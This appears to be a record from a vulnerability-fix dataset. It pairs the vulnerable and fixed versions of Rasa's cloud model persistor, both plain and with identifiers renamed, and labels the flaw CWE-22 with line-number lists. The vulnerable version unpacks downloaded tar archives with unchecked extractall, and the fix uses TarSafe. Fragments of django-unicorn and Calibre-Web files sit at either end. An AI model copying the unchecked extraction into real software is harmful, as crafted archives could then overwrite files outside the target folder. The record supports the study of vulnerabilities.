VAR_3.hash == VAR_27
and (not VAR_13 or not VAR_13.value)
and not VAR_8.calls
):
raise RenderNotModified()
VAR_26 = BeautifulSoup(VAR_17, features="html.parser")
VAR_17 = str(get_root_element(VAR_26))
VAR_20.update(
{"dom": VAR_17, "hash": VAR_27,}
)
if VAR_13:
VAR_20.update(
{"return": VAR_13.get_data(),}
)
if VAR_13.redirect:
VAR_20.update(
{"redirect": VAR_13.redirect,}
)
if VAR_13.poll:
VAR_20.update(
{"poll": VAR_13.poll,}
)
VAR_21 = VAR_8.parent
if VAR_21:
VAR_28 = loads(
VAR_21.get_frontend_context_variables()
)
VAR_29 = generate_checksum(dumps(VAR_28))
VAR_30 = {
"id": VAR_21.component_id,
"checksum": VAR_29,
}
if not VAR_19:
VAR_39 = VAR_21.render()
VAR_8.parent_rendered(VAR_39)
try:
VAR_18.set(
VAR_21.component_cache_key,
get_cacheable_component(VAR_21),
)
except UnicornCacheError as e:
VAR_0.warning(e)
VAR_30.update(
{
"dom": VAR_39,
"data": VAR_28,
"errors": VAR_21.errors,
}
)
VAR_20.update({"parent": VAR_30})
return VAR_20
def FUNC_2(
VAR_2: HttpRequest, VAR_3: ComponentRequest
) -> Dict:
if not get_serial_enabled():
return FUNC_1(VAR_2, VAR_3)
VAR_18 = caches[get_cache_alias()]
VAR_5 = f"unicorn:queue:{VAR_3.id}"
VAR_22 = VAR_18.get(VAR_5) or []
VAR_3.request = None
VAR_22.append(VAR_3)
VAR_18.set(
VAR_5, VAR_22, timeout=get_serial_timeout(),
)
if len(VAR_22) > 1:
VAR_31 = VAR_22[0].epoch
return {
"queued": True,
"epoch": VAR_3.epoch,
"original_epoch": VAR_31,
}
return FUNC_3(
VAR_2, VAR_3.name, VAR_5
)
def FUNC_3(
VAR_2: HttpRequest, VAR_4: str, VAR_5
) -> Dict:
VAR_18 = caches[get_cache_alias()]
VAR_22 = VAR_18.get(VAR_5)
if not VAR_22 or not isinstance(VAR_22, list):
raise UnicornViewError(f"No VAR_2 found for {VAR_5}")
VAR_22 = sorted(VAR_22, VAR_43=lambda r: r.epoch)
VAR_23 = VAR_22[0]
try:
VAR_32 = FUNC_1(VAR_2, VAR_23)
except RenderNotModified:
raise
finally:
VAR_22 = VAR_18.get(VAR_5)
if VAR_22:
component_requests.pop(0)
VAR_18.set(
VAR_5, VAR_22, timeout=get_serial_timeout(),
)
if VAR_22:
VAR_33 = None
for additional_component_request in copy.deepcopy(VAR_22):
if VAR_33:
VAR_33.action_queue.extend(
additional_component_request.action_queue
)
else:
VAR_33 = additional_component_request
for VAR_43, val in VAR_32.get("data", {}).items():
VAR_33.data[VAR_43] = val
VAR_22.pop(0)
VAR_18.set(
VAR_5, VAR_22, timeout=get_serial_timeout(),
)
VAR_34 = FUNC_2(
VAR_2, VAR_33
)
return VAR_34
return VAR_32
@timed
@FUNC_0
@csrf_protect
@require_POST
def FUNC_4(VAR_2: HttpRequest, VAR_4: str = None) -> JsonResponse:
assert VAR_4, "Missing VAR_8 name in url"
VAR_3 = ComponentRequest(VAR_2, VAR_4)
VAR_24 = FUNC_2(VAR_2, VAR_3)
return JsonResponse(VAR_24)
| [
5,
11,
14,
29,
30,
33,
34,
39,
49,
51,
52,
65,
69,
86,
87,
89,
90,
94,
100,
106,
117,
123,
125,
126,
128,
129,
131,
135,
139,
144,
147,
149,
154,
156,
159,
164,
166,
169,
172,
175,
178,
180,
190,
197,
205,
210,
217,
218,
221,
225,
230,
235,
240,
242,
244,
249,
254,
258,
266,
274,
276,
278,
279,
288,
292,
304,
307,
309,
310,
313,
314,
317,
321,
329,
333,
334,
343,
349,
362,
363,
365,
368,
371,
373,
376,
379,
381,
382,
388,
390,
392,
395,
399,
400,
401,
402,
403,
404,
407,
408,
411,
416,
420,
422,
424,
425,
434,
438,
450,
452,
455,
457,
36,
37,
38,
56,
57,
58,
59,
60,
61,
62,
63,
64,
65,
66,
67,
68,
69,
70,
71,
72,
73,
74,
75,
76,
77,
78,
79,
80,
283,
284,
285,
286,
287,
288,
289,
290,
291,
292,
293,
294,
295,
296,
297,
298,
299,
300,
301,
302,
303,
338,
339,
340,
341,
342,
343,
344,
345,
346,
347,
348,
349,
350,
351,
352,
353,
354,
355,
356,
357,
358,
359,
360,
431,
432,
433,
434,
435,
436,
437,
438,
439,
440,
441,
442,
443,
444,
445,
446,
447,
448,
449
] | [
5,
12,
15,
30,
31,
34,
35,
40,
50,
52,
53,
66,
70,
87,
88,
90,
91,
95,
101,
107,
118,
124,
126,
127,
129,
130,
137,
138,
143,
144,
146,
150,
154,
159,
162,
164,
169,
171,
174,
179,
181,
184,
187,
190,
193,
195,
205,
212,
220,
225,
232,
233,
236,
240,
245,
250,
255,
257,
259,
264,
269,
273,
281,
289,
291,
293,
294,
303,
307,
319,
322,
324,
325,
328,
329,
332,
336,
344,
348,
349,
358,
364,
377,
378,
380,
383,
386,
388,
391,
394,
396,
397,
403,
405,
407,
410,
414,
415,
416,
417,
418,
419,
422,
423,
426,
431,
435,
437,
439,
440,
449,
453,
465,
467,
470,
472,
37,
38,
39,
57,
58,
59,
60,
61,
62,
63,
64,
65,
66,
67,
68,
69,
70,
71,
72,
73,
74,
75,
76,
77,
78,
79,
80,
81,
298,
299,
300,
301,
302,
303,
304,
305,
306,
307,
308,
309,
310,
311,
312,
313,
314,
315,
316,
317,
318,
353,
354,
355,
356,
357,
358,
359,
360,
361,
362,
363,
364,
365,
366,
367,
368,
369,
370,
371,
372,
373,
374,
375,
446,
447,
448,
449,
450,
451,
452,
453,
454,
455,
456,
457,
458,
459,
460,
461,
462,
463,
464
] |
0CWE-22
| import abc
import logging
import os
import shutil
import tarfile
from typing import Optional, Text, Tuple, TYPE_CHECKING
import rasa.shared.utils.common
import rasa.utils.common
if TYPE_CHECKING:
from azure.storage.blob import ContainerClient
logger = logging.getLogger(__name__)
def get_persistor(name: Text) -> Optional["Persistor"]:
"""Returns an instance of the requested persistor.
Currently, `aws`, `gcs`, `azure` and providing module paths are supported remote
storages.
"""
if name == "aws":
return AWSPersistor(
os.environ.get("BUCKET_NAME"), os.environ.get("AWS_ENDPOINT_URL")
)
if name == "gcs":
return GCSPersistor(os.environ.get("BUCKET_NAME"))
if name == "azure":
return AzurePersistor(
os.environ.get("AZURE_CONTAINER"),
os.environ.get("AZURE_ACCOUNT_NAME"),
os.environ.get("AZURE_ACCOUNT_KEY"),
)
if name:
try:
persistor = rasa.shared.utils.common.class_from_module_path(name)
return persistor()
except ImportError:
raise ImportError(
f"Unknown model persistor {name}. Please make sure to "
"either use an included model persistor (`aws`, `gcs` "
"or `azure`) or specify the module path to an external "
"model persistor."
)
return None
class Persistor(abc.ABC):
"""Store models in cloud and fetch them when needed."""
def persist(self, model_directory: Text, model_name: Text) -> None:
"""Uploads a model persisted in the `target_dir` to cloud storage."""
if not os.path.isdir(model_directory):
raise ValueError(f"Target directory '{model_directory}' not found.")
file_key, tar_path = self._compress(model_directory, model_name)
self._persist_tar(file_key, tar_path)
def retrieve(self, model_name: Text, target_path: Text) -> None:
"""Downloads a model that has been persisted to cloud storage."""
tar_name = model_name
if not model_name.endswith("tar.gz"):
# ensure backward compatibility
tar_name = self._tar_name(model_name)
self._retrieve_tar(tar_name)
self._decompress(os.path.basename(tar_name), target_path)
@abc.abstractmethod
def _retrieve_tar(self, filename: Text) -> Text:
"""Downloads a model previously persisted to cloud storage."""
raise NotImplementedError
@abc.abstractmethod
def _persist_tar(self, filekey: Text, tarname: Text) -> None: # noqa: F841
"""Uploads a model persisted in the `target_dir` to cloud storage."""
raise NotImplementedError
def _compress(self, model_directory: Text, model_name: Text) -> Tuple[Text, Text]:
"""Creates a compressed archive and returns key and tar."""
import tempfile
dirpath = tempfile.mkdtemp()
base_name = self._tar_name(model_name, include_extension=False)
tar_name = shutil.make_archive(
os.path.join(dirpath, base_name),
"gztar",
root_dir=model_directory,
base_dir=".",
)
file_key = os.path.basename(tar_name)
return file_key, tar_name
@staticmethod
def _tar_name(model_name: Text, include_extension: bool = True) -> Text:
ext = ".tar.gz" if include_extension else ""
return f"{model_name}{ext}"
@staticmethod
def _decompress(compressed_path: Text, target_path: Text) -> None:
with tarfile.open(compressed_path, "r:gz") as tar:
tar.extractall(target_path) # target dir will be created if it not exists
class AWSPersistor(Persistor):
"""Store models on S3.
Fetches them when needed, instead of storing them on the local disk."""
def __init__(
self,
bucket_name: Text,
endpoint_url: Optional[Text] = None,
region_name: Optional[Text] = None,
) -> None:
import boto3
super().__init__()
self.s3 = boto3.resource(
"s3", endpoint_url=endpoint_url, region_name=region_name
)
self._ensure_bucket_exists(bucket_name, region_name)
self.bucket_name = bucket_name
self.bucket = self.s3.Bucket(bucket_name)
def _ensure_bucket_exists(
self, bucket_name: Text, region_name: Optional[Text] = None
) -> None:
import boto3
import botocore
if not region_name:
region_name = boto3.DEFAULT_SESSION.region_name
bucket_config = {"LocationConstraint": region_name}
# noinspection PyUnresolvedReferences
try:
self.s3.create_bucket(
Bucket=bucket_name, CreateBucketConfiguration=bucket_config
)
except botocore.exceptions.ClientError:
pass # bucket already exists
def _persist_tar(self, file_key: Text, tar_path: Text) -> None:
"""Uploads a model persisted in the `target_dir` to s3."""
with open(tar_path, "rb") as f:
self.s3.Object(self.bucket_name, file_key).put(Body=f)
def _retrieve_tar(self, model_path: Text) -> None:
"""Downloads a model that has previously been persisted to s3."""
tar_name = os.path.basename(model_path)
with open(tar_name, "wb") as f:
self.bucket.download_fileobj(model_path, f)
class GCSPersistor(Persistor):
"""Store models on Google Cloud Storage.
Fetches them when needed, instead of storing them on the local disk."""
def __init__(self, bucket_name: Text) -> None:
from google.cloud import storage
super().__init__()
self.storage_client = storage.Client()
self._ensure_bucket_exists(bucket_name)
self.bucket_name = bucket_name
self.bucket = self.storage_client.bucket(bucket_name)
def _ensure_bucket_exists(self, bucket_name: Text) -> None:
from google.cloud import exceptions
try:
self.storage_client.create_bucket(bucket_name)
except exceptions.Conflict:
# bucket exists
pass
def _persist_tar(self, file_key: Text, tar_path: Text) -> None:
"""Uploads a model persisted in the `target_dir` to GCS."""
blob = self.bucket.blob(file_key)
blob.upload_from_filename(tar_path)
def _retrieve_tar(self, target_filename: Text) -> None:
"""Downloads a model that has previously been persisted to GCS."""
blob = self.bucket.blob(target_filename)
blob.download_to_filename(target_filename)
class AzurePersistor(Persistor):
"""Store models on Azure"""
def __init__(
self, azure_container: Text, azure_account_name: Text, azure_account_key: Text
) -> None:
from azure.storage.blob import BlobServiceClient
super().__init__()
self.blob_service = BlobServiceClient(
account_url=f"https://{azure_account_name}.blob.core.windows.net/",
credential=azure_account_key,
)
self._ensure_container_exists(azure_container)
self.container_name = azure_container
def _ensure_container_exists(self, container_name: Text) -> None:
from azure.core.exceptions import ResourceExistsError
try:
self.blob_service.create_container(container_name)
except ResourceExistsError:
# no need to create the container, it already exists
pass
def _container_client(self) -> "ContainerClient":
return self.blob_service.get_container_client(self.container_name)
def _persist_tar(self, file_key: Text, tar_path: Text) -> None:
"""Uploads a model persisted in the `target_dir` to Azure."""
with open(tar_path, "rb") as data:
self._container_client().upload_blob(name=file_key, data=data)
def _retrieve_tar(self, target_filename: Text) -> None:
"""Downloads a model that has previously been persisted to Azure."""
blob_client = self._container_client().get_blob_client(target_filename)
with open(target_filename, "wb") as blob:
download_stream = blob_client.download_blob()
blob.write(download_stream.readall())
| import abc
import logging
import os
import shutil
from tarsafe import TarSafe
from typing import Optional, Text, Tuple, TYPE_CHECKING
import rasa.shared.utils.common
import rasa.utils.common
if TYPE_CHECKING:
from azure.storage.blob import ContainerClient
logger = logging.getLogger(__name__)
def get_persistor(name: Text) -> Optional["Persistor"]:
"""Returns an instance of the requested persistor.
Currently, `aws`, `gcs`, `azure` and providing module paths are supported remote
storages.
"""
if name == "aws":
return AWSPersistor(
os.environ.get("BUCKET_NAME"), os.environ.get("AWS_ENDPOINT_URL")
)
if name == "gcs":
return GCSPersistor(os.environ.get("BUCKET_NAME"))
if name == "azure":
return AzurePersistor(
os.environ.get("AZURE_CONTAINER"),
os.environ.get("AZURE_ACCOUNT_NAME"),
os.environ.get("AZURE_ACCOUNT_KEY"),
)
if name:
try:
persistor = rasa.shared.utils.common.class_from_module_path(name)
return persistor()
except ImportError:
raise ImportError(
f"Unknown model persistor {name}. Please make sure to "
"either use an included model persistor (`aws`, `gcs` "
"or `azure`) or specify the module path to an external "
"model persistor."
)
return None
class Persistor(abc.ABC):
"""Store models in cloud and fetch them when needed."""
def persist(self, model_directory: Text, model_name: Text) -> None:
"""Uploads a model persisted in the `target_dir` to cloud storage."""
if not os.path.isdir(model_directory):
raise ValueError(f"Target directory '{model_directory}' not found.")
file_key, tar_path = self._compress(model_directory, model_name)
self._persist_tar(file_key, tar_path)
def retrieve(self, model_name: Text, target_path: Text) -> None:
"""Downloads a model that has been persisted to cloud storage."""
tar_name = model_name
if not model_name.endswith("tar.gz"):
# ensure backward compatibility
tar_name = self._tar_name(model_name)
self._retrieve_tar(tar_name)
self._decompress(os.path.basename(tar_name), target_path)
@abc.abstractmethod
def _retrieve_tar(self, filename: Text) -> Text:
"""Downloads a model previously persisted to cloud storage."""
raise NotImplementedError
@abc.abstractmethod
def _persist_tar(self, filekey: Text, tarname: Text) -> None: # noqa: F841
"""Uploads a model persisted in the `target_dir` to cloud storage."""
raise NotImplementedError
def _compress(self, model_directory: Text, model_name: Text) -> Tuple[Text, Text]:
"""Creates a compressed archive and returns key and tar."""
import tempfile
dirpath = tempfile.mkdtemp()
base_name = self._tar_name(model_name, include_extension=False)
tar_name = shutil.make_archive(
os.path.join(dirpath, base_name),
"gztar",
root_dir=model_directory,
base_dir=".",
)
file_key = os.path.basename(tar_name)
return file_key, tar_name
@staticmethod
def _tar_name(model_name: Text, include_extension: bool = True) -> Text:
ext = ".tar.gz" if include_extension else ""
return f"{model_name}{ext}"
@staticmethod
def _decompress(compressed_path: Text, target_path: Text) -> None:
with TarSafe.open(compressed_path, "r:gz") as tar:
tar.extractall(target_path) # target dir will be created if it not exists
class AWSPersistor(Persistor):
"""Store models on S3.
Fetches them when needed, instead of storing them on the local disk."""
def __init__(
self,
bucket_name: Text,
endpoint_url: Optional[Text] = None,
region_name: Optional[Text] = None,
) -> None:
import boto3
super().__init__()
self.s3 = boto3.resource(
"s3", endpoint_url=endpoint_url, region_name=region_name
)
self._ensure_bucket_exists(bucket_name, region_name)
self.bucket_name = bucket_name
self.bucket = self.s3.Bucket(bucket_name)
def _ensure_bucket_exists(
self, bucket_name: Text, region_name: Optional[Text] = None
) -> None:
import boto3
import botocore
if not region_name:
region_name = boto3.DEFAULT_SESSION.region_name
bucket_config = {"LocationConstraint": region_name}
# noinspection PyUnresolvedReferences
try:
self.s3.create_bucket(
Bucket=bucket_name, CreateBucketConfiguration=bucket_config
)
except botocore.exceptions.ClientError:
pass # bucket already exists
def _persist_tar(self, file_key: Text, tar_path: Text) -> None:
"""Uploads a model persisted in the `target_dir` to s3."""
with open(tar_path, "rb") as f:
self.s3.Object(self.bucket_name, file_key).put(Body=f)
def _retrieve_tar(self, model_path: Text) -> None:
"""Downloads a model that has previously been persisted to s3."""
tar_name = os.path.basename(model_path)
with open(tar_name, "wb") as f:
self.bucket.download_fileobj(model_path, f)
class GCSPersistor(Persistor):
    """Store models on Google Cloud Storage.
    Fetches them when needed, instead of storing them on the local disk."""

    def __init__(self, bucket_name: Text) -> None:
        # Lazy import: google-cloud-storage is only required when GCS is used.
        from google.cloud import storage

        super().__init__()
        self.storage_client = storage.Client()
        self._ensure_bucket_exists(bucket_name)
        self.bucket_name = bucket_name
        self.bucket = self.storage_client.bucket(bucket_name)

    def _ensure_bucket_exists(self, bucket_name: Text) -> None:
        """Create the bucket if it does not exist yet."""
        from google.cloud import exceptions

        try:
            self.storage_client.create_bucket(bucket_name)
        except exceptions.Conflict:
            # bucket exists
            pass

    def _persist_tar(self, file_key: Text, tar_path: Text) -> None:
        """Uploads a model persisted in the `target_dir` to GCS."""
        blob = self.bucket.blob(file_key)
        blob.upload_from_filename(tar_path)

    def _retrieve_tar(self, target_filename: Text) -> None:
        """Downloads a model that has previously been persisted to GCS."""
        # The blob key doubles as the local output filename.
        blob = self.bucket.blob(target_filename)
        blob.download_to_filename(target_filename)
class AzurePersistor(Persistor):
    """Store models on Azure"""

    def __init__(
        self, azure_container: Text, azure_account_name: Text, azure_account_key: Text
    ) -> None:
        # Lazy import: the azure SDK is only needed when this persistor is used.
        from azure.storage.blob import BlobServiceClient

        super().__init__()
        self.blob_service = BlobServiceClient(
            account_url=f"https://{azure_account_name}.blob.core.windows.net/",
            credential=azure_account_key,
        )
        self._ensure_container_exists(azure_container)
        self.container_name = azure_container

    def _ensure_container_exists(self, container_name: Text) -> None:
        """Create the blob container if it does not exist yet."""
        from azure.core.exceptions import ResourceExistsError

        try:
            self.blob_service.create_container(container_name)
        except ResourceExistsError:
            # no need to create the container, it already exists
            pass

    def _container_client(self) -> "ContainerClient":
        # A fresh client per call; credentials live on blob_service.
        return self.blob_service.get_container_client(self.container_name)

    def _persist_tar(self, file_key: Text, tar_path: Text) -> None:
        """Uploads a model persisted in the `target_dir` to Azure."""
        with open(tar_path, "rb") as data:
            self._container_client().upload_blob(name=file_key, data=data)

    def _retrieve_tar(self, target_filename: Text) -> None:
        """Downloads a model that has previously been persisted to Azure."""
        blob_client = self._container_client().get_blob_client(target_filename)
        with open(target_filename, "wb") as blob:
            download_stream = blob_client.download_blob()
            blob.write(download_stream.readall())
| path_disclosure | {
"code": [
"import tarfile",
" with tarfile.open(compressed_path, \"r:gz\") as tar:"
],
"line_no": [
5,
106
]
} | {
"code": [
"from tarsafe import TarSafe",
" with TarSafe.open(compressed_path, \"r:gz\") as tar:"
],
"line_no": [
5,
106
]
} | import abc
import logging
import os
import shutil
import tarfile
from typing import Optional, Text, Tuple, TYPE_CHECKING
import rasa.shared.utils.common
import rasa.utils.common
if TYPE_CHECKING:
from azure.storage.blob import ContainerClient
VAR_0 = logging.getLogger(__name__)
def FUNC_0(VAR_1: Text) -> Optional["Persistor"]:
if VAR_1 == "aws":
return CLASS_1(
os.environ.get("BUCKET_NAME"), os.environ.get("AWS_ENDPOINT_URL")
)
if VAR_1 == "gcs":
return CLASS_2(os.environ.get("BUCKET_NAME"))
if VAR_1 == "azure":
return CLASS_3(
os.environ.get("AZURE_CONTAINER"),
os.environ.get("AZURE_ACCOUNT_NAME"),
os.environ.get("AZURE_ACCOUNT_KEY"),
)
if VAR_1:
try:
VAR_28 = rasa.shared.utils.common.class_from_module_path(VAR_1)
return VAR_28()
except ImportError:
raise ImportError(
f"Unknown model VAR_28 {VAR_1}. Please make sure to "
"either use an included model VAR_28 (`aws`, `gcs` "
"or `azure`) or specify the module path to an external "
"model VAR_28."
)
return None
class CLASS_0(abc.ABC):
def FUNC_1(self, VAR_2: Text, VAR_3: Text) -> None:
if not os.path.isdir(VAR_2):
raise ValueError(f"Target directory '{VAR_2}' not found.")
VAR_13, VAR_14 = self._compress(VAR_2, VAR_3)
self._persist_tar(VAR_13, VAR_14)
def FUNC_2(self, VAR_3: Text, VAR_4: Text) -> None:
VAR_21 = VAR_3
if not VAR_3.endswith("tar.gz"):
VAR_21 = self._tar_name(VAR_3)
self._retrieve_tar(VAR_21)
self._decompress(os.path.basename(VAR_21), VAR_4)
@abc.abstractmethod
def FUNC_3(self, VAR_5: Text) -> Text:
raise NotImplementedError
@abc.abstractmethod
def FUNC_4(self, VAR_6: Text, VAR_7: Text) -> None: # noqa: F841
raise NotImplementedError
def FUNC_5(self, VAR_2: Text, VAR_3: Text) -> Tuple[Text, Text]:
import tempfile
VAR_22 = tempfile.mkdtemp()
VAR_23 = self._tar_name(VAR_3, VAR_8=False)
VAR_21 = shutil.make_archive(
os.path.join(VAR_22, VAR_23),
"gztar",
root_dir=VAR_2,
base_dir=".",
)
VAR_13 = os.path.basename(VAR_21)
return VAR_13, VAR_21
@staticmethod
def FUNC_6(VAR_3: Text, VAR_8: bool = True) -> Text:
VAR_24 = ".tar.gz" if VAR_8 else ""
return f"{VAR_3}{VAR_24}"
@staticmethod
def FUNC_7(VAR_9: Text, VAR_4: Text) -> None:
with tarfile.open(VAR_9, "r:gz") as tar:
tar.extractall(VAR_4) # target dir will be created if it not exists
class CLASS_1(CLASS_0):
def __init__(
self,
VAR_10: Text,
VAR_11: Optional[Text] = None,
VAR_12: Optional[Text] = None,
) -> None:
import boto3
super().__init__()
self.s3 = boto3.resource(
"s3", VAR_11=endpoint_url, VAR_12=region_name
)
self._ensure_bucket_exists(VAR_10, VAR_12)
self.bucket_name = VAR_10
self.bucket = self.s3.Bucket(VAR_10)
def FUNC_8(
self, VAR_10: Text, VAR_12: Optional[Text] = None
) -> None:
import boto3
import botocore
if not VAR_12:
region_name = boto3.DEFAULT_SESSION.region_name
VAR_25 = {"LocationConstraint": VAR_12}
try:
self.s3.create_bucket(
Bucket=VAR_10, CreateBucketConfiguration=VAR_25
)
except botocore.exceptions.ClientError:
pass # bucket already exists
def FUNC_4(self, VAR_13: Text, VAR_14: Text) -> None:
with open(VAR_14, "rb") as f:
self.s3.Object(self.bucket_name, VAR_13).put(Body=f)
def FUNC_3(self, VAR_15: Text) -> None:
VAR_21 = os.path.basename(VAR_15)
with open(VAR_21, "wb") as f:
self.bucket.download_fileobj(VAR_15, f)
class CLASS_2(CLASS_0):
def __init__(self, VAR_10: Text) -> None:
from google.cloud import storage
super().__init__()
self.storage_client = storage.Client()
self._ensure_bucket_exists(VAR_10)
self.bucket_name = VAR_10
self.bucket = self.storage_client.bucket(VAR_10)
def FUNC_8(self, VAR_10: Text) -> None:
from google.cloud import exceptions
try:
self.storage_client.create_bucket(VAR_10)
except exceptions.Conflict:
pass
def FUNC_4(self, VAR_13: Text, VAR_14: Text) -> None:
VAR_26 = self.bucket.blob(VAR_13)
VAR_26.upload_from_filename(VAR_14)
def FUNC_3(self, VAR_16: Text) -> None:
VAR_26 = self.bucket.blob(VAR_16)
VAR_26.download_to_filename(VAR_16)
class CLASS_3(CLASS_0):
def __init__(
self, VAR_17: Text, VAR_18: Text, VAR_19: Text
) -> None:
from azure.storage.blob import BlobServiceClient
super().__init__()
self.blob_service = BlobServiceClient(
account_url=f"https://{VAR_18}.blob.core.windows.net/",
credential=VAR_19,
)
self._ensure_container_exists(VAR_17)
self.container_name = VAR_17
def FUNC_9(self, VAR_20: Text) -> None:
from azure.core.exceptions import ResourceExistsError
try:
self.blob_service.create_container(VAR_20)
except ResourceExistsError:
pass
def FUNC_10(self) -> "ContainerClient":
return self.blob_service.get_container_client(self.container_name)
def FUNC_4(self, VAR_13: Text, VAR_14: Text) -> None:
with open(VAR_14, "rb") as data:
self._container_client().upload_blob(VAR_1=VAR_13, data=data)
def FUNC_3(self, VAR_16: Text) -> None:
VAR_27 = self._container_client().get_blob_client(VAR_16)
with open(VAR_16, "wb") as VAR_26:
VAR_29 = VAR_27.download_blob()
VAR_26.write(VAR_29.readall())
| import abc
import logging
import os
import shutil
from tarsafe import TarSafe
from typing import Optional, Text, Tuple, TYPE_CHECKING
import rasa.shared.utils.common
import rasa.utils.common
if TYPE_CHECKING:
from azure.storage.blob import ContainerClient
VAR_0 = logging.getLogger(__name__)
def FUNC_0(VAR_1: Text) -> Optional["Persistor"]:
if VAR_1 == "aws":
return CLASS_1(
os.environ.get("BUCKET_NAME"), os.environ.get("AWS_ENDPOINT_URL")
)
if VAR_1 == "gcs":
return CLASS_2(os.environ.get("BUCKET_NAME"))
if VAR_1 == "azure":
return CLASS_3(
os.environ.get("AZURE_CONTAINER"),
os.environ.get("AZURE_ACCOUNT_NAME"),
os.environ.get("AZURE_ACCOUNT_KEY"),
)
if VAR_1:
try:
VAR_28 = rasa.shared.utils.common.class_from_module_path(VAR_1)
return VAR_28()
except ImportError:
raise ImportError(
f"Unknown model VAR_28 {VAR_1}. Please make sure to "
"either use an included model VAR_28 (`aws`, `gcs` "
"or `azure`) or specify the module path to an external "
"model VAR_28."
)
return None
class CLASS_0(abc.ABC):
def FUNC_1(self, VAR_2: Text, VAR_3: Text) -> None:
if not os.path.isdir(VAR_2):
raise ValueError(f"Target directory '{VAR_2}' not found.")
VAR_13, VAR_14 = self._compress(VAR_2, VAR_3)
self._persist_tar(VAR_13, VAR_14)
def FUNC_2(self, VAR_3: Text, VAR_4: Text) -> None:
VAR_21 = VAR_3
if not VAR_3.endswith("tar.gz"):
VAR_21 = self._tar_name(VAR_3)
self._retrieve_tar(VAR_21)
self._decompress(os.path.basename(VAR_21), VAR_4)
@abc.abstractmethod
def FUNC_3(self, VAR_5: Text) -> Text:
raise NotImplementedError
@abc.abstractmethod
def FUNC_4(self, VAR_6: Text, VAR_7: Text) -> None: # noqa: F841
raise NotImplementedError
def FUNC_5(self, VAR_2: Text, VAR_3: Text) -> Tuple[Text, Text]:
import tempfile
VAR_22 = tempfile.mkdtemp()
VAR_23 = self._tar_name(VAR_3, VAR_8=False)
VAR_21 = shutil.make_archive(
os.path.join(VAR_22, VAR_23),
"gztar",
root_dir=VAR_2,
base_dir=".",
)
VAR_13 = os.path.basename(VAR_21)
return VAR_13, VAR_21
@staticmethod
def FUNC_6(VAR_3: Text, VAR_8: bool = True) -> Text:
VAR_24 = ".tar.gz" if VAR_8 else ""
return f"{VAR_3}{VAR_24}"
@staticmethod
def FUNC_7(VAR_9: Text, VAR_4: Text) -> None:
with TarSafe.open(VAR_9, "r:gz") as tar:
tar.extractall(VAR_4) # target dir will be created if it not exists
class CLASS_1(CLASS_0):
def __init__(
self,
VAR_10: Text,
VAR_11: Optional[Text] = None,
VAR_12: Optional[Text] = None,
) -> None:
import boto3
super().__init__()
self.s3 = boto3.resource(
"s3", VAR_11=endpoint_url, VAR_12=region_name
)
self._ensure_bucket_exists(VAR_10, VAR_12)
self.bucket_name = VAR_10
self.bucket = self.s3.Bucket(VAR_10)
def FUNC_8(
self, VAR_10: Text, VAR_12: Optional[Text] = None
) -> None:
import boto3
import botocore
if not VAR_12:
region_name = boto3.DEFAULT_SESSION.region_name
VAR_25 = {"LocationConstraint": VAR_12}
try:
self.s3.create_bucket(
Bucket=VAR_10, CreateBucketConfiguration=VAR_25
)
except botocore.exceptions.ClientError:
pass # bucket already exists
def FUNC_4(self, VAR_13: Text, VAR_14: Text) -> None:
with open(VAR_14, "rb") as f:
self.s3.Object(self.bucket_name, VAR_13).put(Body=f)
def FUNC_3(self, VAR_15: Text) -> None:
VAR_21 = os.path.basename(VAR_15)
with open(VAR_21, "wb") as f:
self.bucket.download_fileobj(VAR_15, f)
class CLASS_2(CLASS_0):
def __init__(self, VAR_10: Text) -> None:
from google.cloud import storage
super().__init__()
self.storage_client = storage.Client()
self._ensure_bucket_exists(VAR_10)
self.bucket_name = VAR_10
self.bucket = self.storage_client.bucket(VAR_10)
def FUNC_8(self, VAR_10: Text) -> None:
from google.cloud import exceptions
try:
self.storage_client.create_bucket(VAR_10)
except exceptions.Conflict:
pass
def FUNC_4(self, VAR_13: Text, VAR_14: Text) -> None:
VAR_26 = self.bucket.blob(VAR_13)
VAR_26.upload_from_filename(VAR_14)
def FUNC_3(self, VAR_16: Text) -> None:
VAR_26 = self.bucket.blob(VAR_16)
VAR_26.download_to_filename(VAR_16)
class CLASS_3(CLASS_0):
def __init__(
self, VAR_17: Text, VAR_18: Text, VAR_19: Text
) -> None:
from azure.storage.blob import BlobServiceClient
super().__init__()
self.blob_service = BlobServiceClient(
account_url=f"https://{VAR_18}.blob.core.windows.net/",
credential=VAR_19,
)
self._ensure_container_exists(VAR_17)
self.container_name = VAR_17
def FUNC_9(self, VAR_20: Text) -> None:
from azure.core.exceptions import ResourceExistsError
try:
self.blob_service.create_container(VAR_20)
except ResourceExistsError:
pass
def FUNC_10(self) -> "ContainerClient":
return self.blob_service.get_container_client(self.container_name)
def FUNC_4(self, VAR_13: Text, VAR_14: Text) -> None:
with open(VAR_14, "rb") as data:
self._container_client().upload_blob(VAR_1=VAR_13, data=data)
def FUNC_3(self, VAR_16: Text) -> None:
VAR_27 = self._container_client().get_blob_client(VAR_16)
with open(VAR_16, "wb") as VAR_26:
VAR_29 = VAR_27.download_blob()
VAR_26.write(VAR_29.readall())
| [
7,
10,
13,
15,
16,
19,
29,
48,
49,
52,
57,
60,
64,
66,
68,
71,
76,
81,
85,
96,
99,
102,
105,
108,
109,
112,
114,
122,
130,
136,
139,
141,
148,
151,
154,
160,
161,
164,
166,
169,
171,
174,
177,
180,
184,
186,
189,
192,
195,
198,
199,
202,
207,
209,
214,
217,
220,
224,
226,
229,
234,
238,
242,
18,
19,
20,
21,
22,
51,
111,
112,
113,
163,
164,
165,
201,
54,
62,
74,
79,
83,
150,
156,
188,
194,
231,
236
] | [
7,
10,
13,
15,
16,
19,
29,
48,
49,
52,
57,
60,
64,
66,
68,
71,
76,
81,
85,
96,
99,
102,
105,
108,
109,
112,
114,
122,
130,
136,
139,
141,
148,
151,
154,
160,
161,
164,
166,
169,
171,
174,
177,
180,
184,
186,
189,
192,
195,
198,
199,
202,
207,
209,
214,
217,
220,
224,
226,
229,
234,
238,
242,
18,
19,
20,
21,
22,
51,
111,
112,
113,
163,
164,
165,
201,
54,
62,
74,
79,
83,
150,
156,
188,
194,
231,
236
] |
3CWE-352
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler
#
# This program is free software: you can redistribute it and/or modify
